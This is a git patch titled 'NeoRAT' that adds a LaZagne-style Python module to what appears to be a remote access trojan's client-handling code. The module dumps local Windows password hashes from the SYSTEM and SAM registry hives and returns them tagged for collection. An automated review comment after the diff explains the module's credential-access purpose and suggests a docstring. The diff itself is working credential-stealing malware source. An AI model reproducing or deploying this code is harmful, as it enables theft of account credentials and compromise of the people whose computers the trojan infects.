From 20dbeb2f38684c65ff0a4b99012c161295708e88 Mon Sep 17 00:00:00 2001
From: AL-LCL
Date: Fri, 19 May 2023 11:01:49 +0200
Subject: NeoRAT
---
.../client_handling/lazagne/softwares/windows/hashdump.py | 15 +++++++++++++++
1 file changed, 15 insertions(+)
create mode 100644 foreign/client_handling/lazagne/softwares/windows/hashdump.py
(limited to 'foreign/client_handling/lazagne/softwares/windows/hashdump.py')
diff --git a/foreign/client_handling/lazagne/softwares/windows/hashdump.py b/foreign/client_handling/lazagne/softwares/windows/hashdump.py
new file mode 100644
index 0000000..2d53f28
--- /dev/null
+++ b/foreign/client_handling/lazagne/softwares/windows/hashdump.py
@@ -0,0 +1,15 @@
+# -*- coding: utf-8 -*-
+from .creddump7.win32.hashdump import dump_file_hashes
+from foreign.client_handling.lazagne.config.module_info import ModuleInfo
+from foreign.client_handling.lazagne.config.constant import constant
+
+
+class Hashdump(ModuleInfo):
+ def __init__(self):
+ ModuleInfo.__init__(self, 'hashdump', 'windows', system_module=True)
+
+ def run(self):
+ hashdump = dump_file_hashes(constant.hives['system'], constant.hives['sam'])
+ if hashdump:
+ pwd_found = ['__Hashdump__', hashdump]
+ return pwd_found
-- cgit v1.2.3
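Review bot: `Hashdump` and its `run()` carry no docstring or comment, so nothing in the new file tells a reader that this module handles credential material: it passes the paths held in `constant.hives['system']` and `constant.hives['sam']` to creddump7's `dump_file_hashes` and returns the result tagged `'__Hashdump__'`. A class docstring such as `"""Extract local account password hashes from saved SYSTEM and SAM hive files (credential access; registered as a system module)."""` would make that explicit for anyone auditing or triaging this tree. Where the hive copies are produced is not visible in this hunk (presumably elsewhere in the lazagne package); for defenders, that export of the SAM and SYSTEM hives is the step most likely to be observable on a host. Indentation was lost in this rendering, so whether `return pwd_found` sits inside the `if hashdump:` branch cannot be confirmed from the page.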